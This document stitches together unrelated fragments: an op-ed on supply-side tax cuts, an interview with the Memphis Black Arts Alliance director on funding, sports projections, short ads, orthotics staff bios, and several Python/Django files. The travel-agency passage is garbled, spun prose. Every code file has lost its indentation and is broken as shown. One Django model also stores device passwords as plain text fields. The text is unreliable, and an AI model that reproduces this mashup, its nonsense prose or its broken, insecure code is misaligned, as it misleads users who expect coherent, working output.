Apparently, some people think we never learn. The frontrunners for the Republican presidential nomination, Donald Trump and Ted Cruz, have each proposed enormous supply-side tax cuts. According to the Tax Policy Center, each of their plans would cost more than $10 trillion over 10 years in lost revenue and higher interest costs as a result of the increased debt created by those tax cuts. Meanwhile, they’d provide the average member of the top 0.1 percent a tax cut of well over $1 million per year.
It’s like we’re stuck in a movie theatre and they just keep showing the same horror film with the same terrible ending.
It is almost impossible for us to have meaningful tax reform, either incremental or transformative, until there is general acknowledgement that supply-side economics has not and does not work. It’s time to move beyond wishful thinking and focus on what has actually happened.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division
import csv
import sys
from collections import Counter
def do_command(args):
reader = csv.reader(args.input, delimiter="\t")
writer = csv.writer(args.output, delimiter="\t")
header = next(reader)
assert header == "id baseline_perspective generation_perspective baseline_votes generation_votes none_votes n_votes error_analysis".split(), "invalid header: " + header
counter = Counter()
for id, baseline_perspective, generation_perspective, baseline_votes, generation_votes, none_votes, n_votes, error_analysis in reader:
#if generation_perspective == "": continue
baseline_wins = int(baseline_votes) >= int(n_votes)/2
generation_wins = int(generation_votes) >= int(n_votes)/2
counter[baseline_wins, generation_wins] += 1
writer.writerow(["baseline perspective is rated useful", "generation perspective is rated useful", "# Mentions"])
for truth in [True, False]:
for truth_ in [True, False]:
writer.writerow([truth, truth_, counter[truth, truth_]])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser( description='' )
parser.add_argument('--input', type=argparse.FileType('r'), default=sys.stdin, help="")
parser.add_argument('--output', type=argparse.FileType('w'), default=sys.stdout, help="")
parser.set_defaults(func=do_command)
#subparsers = parser.add_subparsers()
#command_parser = subparsers.add_parser('command', help='' )
#command_parser.set_defaults(func=do_command)
ARGS = parser.parse_args()
ARGS.func(ARGS)
|
These are the latest Atlantic Sun Conference projections based on our NCAA College Basketball Ratings. These projections for the Atlantic Sun are based on actual results of previous games and our predicted results for games upcoming in the future. The rank (or seed) for each team is only based upon their projected finish in the conference. Our latest update to these projections was done on 3/17/2019.
Our full list of NCAA Tournament and NIT Tournament projections can be found here. The below list contains our latest NCAA Tournament projections for teams within the Atlantic Sun Conference. The “Bracket Rating” is based on a proprietary formula that projects a team’s bracket seeding by the NCAA Tournament committee.
Based on 100 simulations, this is the projected place where each team finishes in the Atlantic Sun Conference standings.
Below are the odds to advance to each stage of the Atlantic Sun Conference Tournament. The table below is based on 1,000 simulations. The top eight of nine teams in the Atlantic Sun Conference play in a standard eight-team tournament at the higher seed’s campus site.
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-18 13:45
from __future__ import unicode_literals
import block.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('block', '0018_image_user'),
('compose', '0017_auto_20160205_1752'),
]
operations = [
migrations.CreateModel(
name='Calendar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('date_moderated', models.DateTimeField(blank=True, null=True)),
('order', models.IntegerField()),
],
options={
'verbose_name_plural': 'Calendar',
'verbose_name': 'Calendar',
},
),
migrations.CreateModel(
name='CalendarBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
],
options={
'verbose_name_plural': 'Blocks',
'abstract': False,
'verbose_name': 'Block',
},
),
migrations.CreateModel(
name='Map',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('date_moderated', models.DateTimeField(blank=True, null=True)),
('order', models.IntegerField()),
],
options={
'verbose_name_plural': 'Map',
'verbose_name': 'Map',
},
),
migrations.CreateModel(
name='MapBlock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('page_section', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='block.PageSection')),
],
options={
'verbose_name_plural': 'Blocks',
'abstract': False,
'verbose_name': 'Block',
},
),
migrations.AddField(
model_name='map',
name='block',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.MapBlock'),
),
migrations.AddField(
model_name='map',
name='edit_state',
field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
),
migrations.AddField(
model_name='map',
name='map',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='map', to='block.Link'),
),
migrations.AddField(
model_name='map',
name='moderate_state',
field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
),
migrations.AddField(
model_name='map',
name='user_moderated',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calendar',
name='block',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content', to='compose.CalendarBlock'),
),
migrations.AddField(
model_name='calendar',
name='calendar',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='calendar', to='block.Link'),
),
migrations.AddField(
model_name='calendar',
name='edit_state',
field=models.ForeignKey(default=block.models._default_edit_state, on_delete=django.db.models.deletion.CASCADE, to='block.EditState'),
),
migrations.AddField(
model_name='calendar',
name='moderate_state',
field=models.ForeignKey(default=block.models._default_moderate_state, on_delete=django.db.models.deletion.CASCADE, to='block.ModerateState'),
),
migrations.AddField(
model_name='calendar',
name='user_moderated',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='map',
unique_together=set([('block', 'moderate_state')]),
),
migrations.AlterUniqueTogether(
name='calendar',
unique_together=set([('block', 'moderate_state')]),
),
]
|
Just Cruisin’ Plus is a full-service travel agency, specializing in cruises and holidays. All inclusive vacation together with sports activities meals, drinks, and varied non-motorized water. This year are there much more non-stop discounted flights to Mexico so financial savings are wonderful! Chef Ricardo Muñoz Zurita hails from Mexico City the place he was named one of many high chefs in Mexico. Cancun by means of apple, because of go away on July 14th, hurricane was fastly approaching, (they didn’t have insurance coverage) APPLE TOLD THEM TO GO OR LOOSE YOUR CASH, WOULDN’T ALLOW THEM TO POSTPONE JOURNEY, advised apple agent could be at resort to assist them out should storm get unhealthy, and help them get out early!!!!!!!!!
|
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import (
CartesianRepresentation,
get_body_barycentric,
solar_system_ephemeris,
)
from astropy.tests.helper import assert_quantity_allclose
from astropy.time import Time
from poliastro.bodies import (
Earth,
Jupiter,
Mars,
Mercury,
Neptune,
Saturn,
Sun,
Uranus,
Venus,
)
from poliastro.constants import J2000
from poliastro.frames.ecliptic import GeocentricSolarEcliptic
from poliastro.frames.equatorial import (
GCRS,
HCRS,
ICRS,
JupiterICRS,
MarsICRS,
MercuryICRS,
NeptuneICRS,
SaturnICRS,
UranusICRS,
VenusICRS,
)
from poliastro.frames.fixed import (
ITRS,
JupiterFixed,
MarsFixed,
MercuryFixed,
NeptuneFixed,
SaturnFixed,
SunFixed,
UranusFixed,
VenusFixed,
)
@pytest.mark.parametrize(
"body, frame",
[
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_planetary_frames_have_proper_string_representations(body, frame):
coords = frame()
assert body.name in repr(coords)
@pytest.mark.parametrize(
"body, frame",
[
(Sun, HCRS),
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Earth, GCRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_planetary_icrs_frame_is_just_translation(body, frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
vector = CartesianRepresentation(x=100 * u.km, y=100 * u.km, z=100 * u.km)
vector_result = (
frame(vector, obstime=epoch)
.transform_to(ICRS)
.represent_as(CartesianRepresentation)
)
expected_result = get_body_barycentric(body.name, epoch) + vector
assert_quantity_allclose(vector_result.xyz, expected_result.xyz)
@pytest.mark.parametrize(
"body, frame",
[
(Sun, HCRS),
(Mercury, MercuryICRS),
(Venus, VenusICRS),
(Earth, GCRS),
(Mars, MarsICRS),
(Jupiter, JupiterICRS),
(Saturn, SaturnICRS),
(Uranus, UranusICRS),
(Neptune, NeptuneICRS),
],
)
def test_icrs_body_position_to_planetary_frame_yields_zeros(body, frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
vector = get_body_barycentric(body.name, epoch)
vector_result = (
ICRS(vector)
.transform_to(frame(obstime=epoch))
.represent_as(CartesianRepresentation)
)
assert_quantity_allclose(vector_result.xyz, [0, 0, 0] * u.km, atol=1e-7 * u.km)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_fixed_inertial_conversion(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
fixed_position = fixed_frame(
0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
)
inertial_position = fixed_position.transform_to(inertial_frame(obstime=epoch))
assert_quantity_allclose(
fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
)
assert_quantity_allclose(
inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_inertial_fixed_conversion(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
inertial_position = inertial_frame(
0 * u.deg, 0 * u.deg, body.R, obstime=epoch, representation_type="spherical"
)
fixed_position = inertial_position.transform_to(fixed_frame(obstime=epoch))
assert_quantity_allclose(
fixed_position.spherical.distance, body.R, atol=1e-7 * u.km
)
assert_quantity_allclose(
inertial_position.spherical.distance, body.R, atol=1e-7 * u.km
)
@pytest.mark.parametrize(
"body, fixed_frame, inertial_frame",
[
(Sun, SunFixed, HCRS),
(Mercury, MercuryFixed, MercuryICRS),
(Venus, VenusFixed, VenusICRS),
(Earth, ITRS, GCRS),
(Mars, MarsFixed, MarsICRS),
(Jupiter, JupiterFixed, JupiterICRS),
(Saturn, SaturnFixed, SaturnICRS),
(Uranus, UranusFixed, UranusICRS),
(Neptune, NeptuneFixed, NeptuneICRS),
],
)
def test_planetary_inertial_roundtrip_vector(body, fixed_frame, inertial_frame):
with solar_system_ephemeris.set("builtin"):
epoch = J2000
sampling_time = 10 * u.s
fixed_position = fixed_frame(
np.broadcast_to(0 * u.deg, (1000,), subok=True),
np.broadcast_to(0 * u.deg, (1000,), subok=True),
np.broadcast_to(body.R, (1000,), subok=True),
representation_type="spherical",
obstime=epoch + np.arange(1000) * sampling_time,
)
inertial_position = fixed_position.transform_to(
inertial_frame(obstime=epoch + np.arange(1000) * sampling_time)
)
fixed_position_roundtrip = inertial_position.transform_to(
fixed_frame(obstime=epoch + np.arange(1000) * sampling_time)
)
assert_quantity_allclose(
fixed_position.cartesian.xyz,
fixed_position_roundtrip.cartesian.xyz,
atol=1e-7 * u.km,
)
def test_round_trip_from_GeocentricSolarEcliptic_gives_same_results():
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gse = gcrs.transform_to(GeocentricSolarEcliptic(obstime=Time("J2000")))
gcrs_back = gse.transform_to(GCRS(obstime=Time("J2000")))
assert_quantity_allclose(gcrs_back.dec.value, gcrs.dec.value, atol=1e-7)
assert_quantity_allclose(gcrs_back.ra.value, gcrs.ra.value, atol=1e-7)
def test_GeocentricSolarEcliptic_against_data():
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gse = gcrs.transform_to(GeocentricSolarEcliptic(obstime=J2000))
lon = 233.11691362602866
lat = 48.64606410986667
assert_quantity_allclose(gse.lat.value, lat, atol=1e-7)
assert_quantity_allclose(gse.lon.value, lon, atol=1e-7)
def test_GeocentricSolarEcliptic_raises_error_nonscalar_obstime():
with pytest.raises(ValueError) as excinfo:
gcrs = GCRS(ra="02h31m49.09s", dec="+89d15m50.8s", distance=200 * u.km)
gcrs.transform_to(GeocentricSolarEcliptic(obstime=Time(["J3200", "J2000"])))
assert (
"To perform this transformation the "
"obstime Attribute must be a scalar." in str(excinfo.value)
)
|
In the study, we explore this idea of “philanthropic redlining,” where essentially certain groups – primarily black- and brown-led organizations – are just excluded from traditional funding. Can you explain how you have experienced that with Memphis Black Arts Alliance or within the nonprofit sector?
I wouldn’t go so far as to say the organizations are completely excluded, but in my opinion, it seems that the funds are “limited.” I would use that word: limited. I say this as someone who’s sat on several grant panels – there was definitely a limited few groups that these organizations gave money to, and that is a tragedy – yet it did not stop Black arts. The thing about artists of color is that we’ve always found a way to do what we want to do! Get mama on the tickets. Get daddy to build the sets. We’ll find a way to make it happen, because we are artists through and through.
What do you think has been a critical piece in MBAA’s survival in this environment, given that some of the major avenues for funding may not have been available or been limited?
First, Memphis Black Arts Alliance was developed as a collaborative organization that had many African-American arts groups, arts organizations and artists that were under its umbrella. So it was easier to get support from certain funders, since they would give a lump sum of money and then MBAA would actually divvy that our amongst its members, depending on the grant, funding several different organizations with one amount.
The organization, over the course of time, changed drastically, where it shifted into a place of actually competing with the very groups that used to exist under that umbrella for funding.
If there was something that I would say was critical to our survival all these years, it would be relationships. My predecessor Bennie West was excellent at developing relationships with funders for the organizations that were under that umbrella. And those relationships never went away. Anytime I go anywhere, they know me because her – that being the case created a foundation for some stability. And also I think having the network of groups being funded was important, too. The art of collaboration. A funder is more apt to want to fund an organization that’s helping bridge gaps and is helping a lot of different people by collaborating with other organizations.
So now that the organization has shifted to more direct service and less of the umbrella, what do you think the challenges are with funding?
At the core, Funders want to see the community improve. But they also need to feel secure. They need to feel that if they’re going to invest a certain amount of money in you, that you can manage it well and you’re going to do what you say you’re going to do with it. So I think the trust component is huge. We have to establish relationships with the funder so that they trust us with their funding. I think that because most funders have relationships with other organizations, white-led organizations, that they just have more of a tendency to trust them. They tend to trust that they will do what they say they’re going to do. That dividing line is there: relationship. And it’s not that black or brown led organizations can’t be trusted – of course we can. But it’s all about the relationship, you know? Have we established trust with them?
How do you see that playing out and how do you try to address it?
Allow me to paint a picture for you: There are some white dancers at a school, let’s say Germantown. They’re great. They’re very talented and very gifted. They approach funders about sending them to a community center in an underserved area like 38126. It’s in a choice neighborhood, recognized by the federal government as an area of concern. The funders like and accept their proposal and they are granted the funding. We see funders do this sort of thing all the time.
Now here comes another organization, let’s call it TriBar, and they have trained African American dancers for a many years and are equally as talented and gifted. They desire to take their dancers over to the same community center, which is in their neighborhood, and need funding to do so. So they apply. “Well, we’re already sending dancers there.” Unfortunately this happens a lot.
MBAA is going through a similar scenario right now. I think Ballet Memphis or New Ballet Ensemble is currently sending dancers over to a center in 38126 and we’re trying to get our ArtsReach program into that same center, but they have secured the funding for ballet and don’t have the funding for MBAA. So inevitably, we don’t get the funding and we don’t take our program to that center. The tragedy is that the center has mostly African American children and by providing professionally trained African American artists to teach, versus other cultures, could possibly inspire the children to aspire to reach past their current circumstances in a way that other cultures could not. So, how do we break that curse? How do we step in there and change this? I believe that it is literally just being present and developing relationships with our funders; but this is not easy. We have to be determined. We all have to be determined to cross those lines. We have to want it.
How do you think MMI has helped you get over that gap?
I believe that MMI has afforded a lot of organizations the opportunity to show our worthiness. That we are capable of presenting great, wonderful work. We are capable of managing our resources. We are capable of developing strategic plans and sustainability models. We’re capable of doing all of that – all we needed was someone to believe in us, and help us by providing funding and the necessary training to package our work. I think that MMI has helped level the playing field, if you will. It’s still going to take determination to cross those lines, but with all of the things that we’ve learned, we now have what is needed to cross those lines. The upside to all of this is that we no longer cross the lines with nothing in hand anymore. Now we cross the lines, how should you say… “packing.” Now we’ve got something to show you. Boom. We’ve done this. Boom. We’re doing that. Boom and we’ve got this done and we’ve got that done. We’re going in with something in hand demonstrating our capability and worthiness to manage the funding, and that’s how MMI is helping to bridge the gap.
Lar’Juanette Williams is a native Memphian and executive director of the Memphis Black Arts Alliance. Prior to taking the helm at MBAA, Williams spent 25 years away from her hometown after earning degrees in arts communication and theater and arts administration. Her diverse career includes time in city government in Los Angeles, where she directed the Los Angeles Civic Leadership Awards; helping to reestablish the historic Bijou Theater in Knoxville, Tenn.; the creation of Knoxville’s “King Week” through her work with the Martin Luther King Commemoration Commission of Greater Knoxville; and program administration for KAATCH (Knoxville African American Tours of Cultural Heritage), a federally funded program that created East Tennessee’s first virtual tour through downtown Knoxville.
|
#coding=utf-8
from django.db import models
from django.dispatch import receiver
from django.utils.translation import ugettext as _
from django.db.models.signals import pre_save, post_save
import gsx
from servo.models.common import Tag, Attachment
class Device(models.Model):
sn = models.CharField(max_length=32, blank=True,
verbose_name=_(u'sarjanumero'))
description = models.CharField(max_length=128, default=_('Uusi laite'),
verbose_name=_(u'kuvaus'))
username = models.CharField(max_length=32, blank=True, null=True,
verbose_name=_(u'käyttäjätunnus'))
password = models.CharField(max_length=32, blank=True, null=True,
verbose_name=_(u'salasana'))
purchased_on = models.DateField(blank=True, null=True,
verbose_name=_(u'hankittu'))
notes = models.TextField(blank=True, null=True,
verbose_name=_(u'merkinnät'))
tags = models.ManyToManyField(Tag, null=True, blank=True,
verbose_name=_(u'tagit'))
files = models.ManyToManyField(Attachment)
@classmethod
def from_gsx(cls, sn):
"""
Search GSX and initialize a new Device with the results
"""
dev = gsx.Product(sn).get_warranty()
device = Device(sn=dev.serialNumber,
description=dev.productDescription,
purchased_on=dev.estimatedPurchaseDate)
device.save()
return device
def get_absolute_url(self):
return "/devices/%d/view/" % self.pk
def spec_id(self):
return self.tags.all()[0].id
def __unicode__(self):
return '%s (%s)' %(self.description, self.sn)
class Meta:
app_label = 'servo'
@receiver(post_save, sender=Device)
def create_spec(sender, instance, created, **kwargs):
# make sure we have this spec
if created:
(tag, created) = Tag.objects.get_or_create(title=instance.description,
type='device')
instance.tags.add(tag)
instance.save()
|
Local Food Kent - If you’re planning a party or wedding and want to produce a wow factor, look local for a cakemaker that can turn your vision into a sight to behold.
The cake is the focal point of any celebration, be it a special birthday, Christening or a wedding, so why settle for second best when you can choose a hand-crafted cake or selection if cupcakes? Choosing a local cakemaker will ensure a bespoke and reliable service that will fit in with your theme. Many delis and farm shops in Kent sell fabulous cakes and you can usually order ahead when you’re catering for a crowd or having a party.
|
"""
Copyright (C) 2017 Open Source Robotics Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from geometry.point import Point
from models.city import City
from models.street import Street
from models.trunk import Trunk
from models.block import Block
from models.building import Building
from models.ground_plane import GroundPlane
from models.road import *
from builders.abstract_city_builder import AbstractCityBuilder
class SimpleCityBuilder(AbstractCityBuilder):
def _buid_city(self):
# Must be odd
size = 5
city = City("Simple City")
self.multiplier = 100
self._create_ground_plane(city, size)
self._setup_intersections(city, size)
self._create_inner_streets(city, size)
self._create_surrounding_ring_road(city, size)
# Disabling this temporarily as we are focusing on road networks
# self._create_blocks(city, size)
# self._create_buildings(city, size)
return city
def _setup_intersections(self, city, size):
self.intersections = [[Point(self.multiplier * x, self.multiplier * y, 0)
for y in range(size)] for x in range(size)]
for x in range(size - 1):
self.intersections[x][0] = self.intersections[x][0] + Point(0, -2)
self.intersections[size - 1][0] = self.intersections[size - 1][0] + Point(2, -2)
for y in range(1, size):
self.intersections[size - 1][y] = self.intersections[size - 1][y] + Point(2, 0)
for x in range(size - 1):
self.intersections[size - x - 1][size - 1] = self.intersections[size - x - 1][size - 1] + Point(0, 2)
self.intersections[0][size - 1] = self.intersections[0][size - 1] + Point(-2, 2)
for y in range(1, size):
self.intersections[0][size - y - 1] = self.intersections[0][size - y - 1] + Point(-2, 0)
for x in range(size):
for y in range(size):
city.add_intersection_at(self.intersections[x][y])
def _create_ground_plane(self, city, size):
ground_plane_size = size * self.multiplier
ground_plane = GroundPlane(ground_plane_size,
Point(ground_plane_size / 2,
ground_plane_size / 2,
0),
'ground_plane')
city.set_ground_plane(ground_plane)
def _create_inner_streets(self, city, size):
# Vertical
for x in range(1, size - 1):
road = Street()
for y in range(size):
road.add_control_point(self.intersections[x][y])
city.add_road(road)
# Horizontal
for y in range(1, size - 1):
road = Street()
for x in range(size):
road.add_control_point(self.intersections[x][y])
city.add_road(road)
# Diagonals
road = Street()
for i in range(size):
road.add_control_point(self.intersections[i][i])
city.add_road(road)
road = Street()
for i in range(size):
road.add_control_point(self.intersections[i][size - i - 1])
city.add_road(road)
def _create_surrounding_ring_road(self, city, size):
ring_road_1 = Trunk(name='RingRoad1')
for x in range(size):
ring_road_1.add_control_point(self.intersections[x][0])
city.add_road(ring_road_1)
ring_road_2 = Trunk(name='RingRoad2')
for y in range(size):
ring_road_2.add_control_point(self.intersections[size - 1][y])
city.add_road(ring_road_2)
ring_road_3 = Trunk(name='RingRoad3')
for x in range(size):
ring_road_3.add_control_point(self.intersections[size - x - 1][size - 1])
city.add_road(ring_road_3)
ring_road_4 = Trunk(name='RingRoad4')
for y in range(size):
ring_road_4.add_control_point(self.intersections[0][size - y - 1])
city.add_road(ring_road_4)
def _create_blocks(self, city, size):
blocks_count = size - 1
block_size = 96
inital_offset = 50
street_width = 4
half_street_width = street_width / 2.0
triangle_delta = 93
for x in range(blocks_count):
for y in range(blocks_count):
if x == y:
origin = Point(street_width + 1 + x * self.multiplier,
half_street_width + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
origin = Point(half_street_width + x * self.multiplier,
street_width + 1 + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
elif x + y == blocks_count - 1:
origin = Point(half_street_width + x * self.multiplier,
half_street_width + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(triangle_delta, 0, 0), Point(0, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
origin = Point((x + 1) * self.multiplier - half_street_width,
street_width + 1 + y * self.multiplier, 0)
vertices = [Point(0, 0, 0), Point(0, triangle_delta, 0), Point(-triangle_delta, triangle_delta, 0)]
block = Block(origin, vertices)
city.add_block(block)
else:
origin = Point(inital_offset + x * self.multiplier,
inital_offset + y * self.multiplier, 0)
block = Block.square(origin, block_size)
city.add_block(block)
def _create_buildings(self, city, size):
blocks_count = size - 1
building_spacing = 18
for x in range(blocks_count):
for y in range(blocks_count):
for block_x in range(3):
for block_y in range(3):
pos = Point(x * self.multiplier + block_x * 30 + building_spacing,
y * self.multiplier + block_y * 30 + building_spacing, 0)
if abs(pos.y - pos.x) > building_spacing and \
abs(pos.y + pos.x - self.multiplier * blocks_count) > building_spacing:
building = Building.square(pos, 20, 40)
city.add_building(building)
|
FirstChoice IPO Analysis: L&T group IPOs - pricing was wrong.
In the year 2016, there were 2 IPOs from the L&T stable. Larsen & Toubro Infotech Limited and L&T Technology Services Limited.
The first one priced its IPO at Rs 710 and the second one at Rs 860 a share.
Both have disappointed in the exchanges. L&T Infotech is trading at Rs 680, down Rs 30 and L&T Technology stock trading around Rs 805, down Rs 55.
Retail investors had lot of expectation from these 2 companies which has been belied.
BRLMs of the above IPOs should introspect. The pricing was very aggressive. Investors, particularly retail, have lost money. Most importantly there is loss of credibility for - both the group and the BRLMs.
Labels: L&T group IPOs - pricing was wrong.
|
"""A module to retrieve weather warning data from Hong Kong Observatory"""
import json
import requests
BASE_URL = 'http://www.weather.gov.hk/'
URL_UC = 'wxinfo/json/warnsumc.xml'
URL_EN = 'wxinfo/json/warnsum.xml'
def weather_warning(lang='UC'):
"""A function to retrieve weather warning data from Hong Kong Observatory"""
response = {}
if lang in ['UC', 'EN']:
try:
if lang == 'UC':
data = requests.get(BASE_URL + URL_UC)
if lang == 'EN':
data = requests.get(BASE_URL + URL_EN)
data_2 = json.loads(data.text.replace('var weather_warning_summary = ', '')[:-2] + '}')
response['result'] = data_2
response['status'] = 1
except IndexError:
response['result'] = ''
response['status'] = 2
except requests.exceptions.RequestException:
response['result'] = ''
response['status'] = 5
else:
response['result'] = ''
response['status'] = 0
return response
|
Identical twin brothers Keith and Ken Cornell founded Cornell Orthotics & Prosthetics in 1985. Sharing an uncommon dedication for excellence in their field, the brothers have steadily developed Cornell Orthotics & Prosthetics into a multi-site, patient-care practice in the greater Boston area. The two certified prosthetists and orthotists, along with the rest of our staff, are dedicated to providing exceptional care for whoever walks through our doors.
Keith received his undergraduate degree from Saint Anselm’s College and completed his postgraduate prosthetic coursework at Northwestern and New York Universities. He has been an ABC certified prosthetist since 1980. He was elected to the American Orthotic & Prosthetic Association board of directors in 1999 and served as president in 2004. Locally, he is a past president of the Massachusetts Society of O&P and played a major role in the passing of the “Massachusetts Prosthetic Parity Law”. He is passionate about his field and has a long history of active participation in clinical, business and patient organizations. He is a guest lecturer at North Shore Community College and prosthetic residency director at Cornell O&P. Keith specializes in both upper and lower extremity prosthetics and profoundly enjoys his patient practice. He is the inventor of the patented CJ Socket and founder of the COPAA amputee support association.
Credo: To take the time to listen and understand, then formulate a plan to make a greater improvement than expected.
David began his career with Cornell O & P in 1986. With a BA from Salem State College, he continued post-graduate education in orthotics at Northwestern University. Now an ABC certified Orthotist with many years of experience, David manages a wide spectrum of pathomechanical cases. Chief Orthotist at Franciscan Children’s Hospital and Rehabilitation Center, David specializes in the pediatric population. He provides treatment at both the CP and Brace clinics, as well as managing the orthotic care of the in-patient population and Physical Therapy departments.
Gary joined the Cornell team in 2002. He has over 35 years of work experience and is ABC certified in both Prosthetics and Orthotics. A former owner of two Prosthetic/Orthotic practices, Gary brings with him a wide range of capabilities, including extensive expertise in upper extremity prosthetics and lower extremity orthotics. Gary manages clinics in prosthetics and orthotics for both in-patients and out-patients at the Whittier Rehabilitation Hospital in Bradford, MA, along with many other facilities within the Northern Massachusetts/Southern and Seacoast New Hampshire areas. Gary has served as Chair of the Upper Extremity Prosthetic Society of AAOP and has been a guest speaker at numerous national and regional symposia. He is currently serving on the Advisory Board of AOPA’s Almanac, a monthly industry magazine.
Marc has been a licensed physical therapist assistant since 2000, also an ABC registered orthotic assistant. Marc is also BOC Orthotist. He specializes in most orthopedic and neurological conditions with special interests in spinal pathologies as well as pediatrics. Marc is currently lead practitioner at the new office located at Massachusetts General Hospital Center for Outpatient Care which opened late 2009.
Rob is a Board Certified Prosthetist and a Licensed Physical Therapy Assistant with extensive experience in Orthopedics, Cardiac, Neurological Disorders, Pulmonary, Sports Medicine and Cancer Rehabilitation. He has been with Cornell O&P since 2000 and brings with him over 2 decades of patient care. Rob currently works directly with Keith Cornell in all aspects of patient care and prosthetic design, while also maintaining his own patient base.
Mike Domenicucci has had over 30 years of experience in the field of upper and lower limb prosthetics. He received his ABC certification in prosthetics from Northwestern University. He is a Past President of the New England American Academy of Orthotists and Prosthetists and is still active on its Advisory Board. He has worked extensively with the Veterans Administration fitting American Veterans to the latest prosthetic technologies.
Mike’s latest focus is in research and development of new liner and socket technologies for lower limb prostheses.
Brad Shores, LATC, (License Certified Athletic Trainer), BOCO (Board Certified Orthotist). Mr. Shores background includes 6 Season in Professional Baseball as an Athletic Trainer with the Kansas City Royals system. Manager and owner of Foot Fitness Plus since 1997. Brad works for Cornell O & P. Board Certified as an Orthotist in 2005. Combining the world of professional sports to the world of orthotics and bracing.
Braylan is currently a prosthetic resident at Cornell Orthotics & Prosthetics. She graduated from the University of Hartford Orthotic & Prosthetic master’s program in 2017. She is scheduled to begin her orthotic residency in July of 2018. Braylan is a lacrosse coach and enjoys being active in recreational sports and working with children.
Nicole has been ABC Certified CPO since 2012 and she loves her job. Her education includes a B.S. in Biological Anthropology from Duke University, M.S. in Biomedical Engineering from University of California in Davis, and post-grad certificates in Orthotics and Prosthetics from Northwestern University. She specializes in pediatrics, especially regarding children with neuromuscular involvement, but looks forward to working with more adults. She is experienced with custom lower and upper extremity orthoses as well as bracing for idiopathic and neuromuscular scoliosis, and has been trained in Elaine Owens’ paradigm of AFO alignment.
|
# coding=utf-8
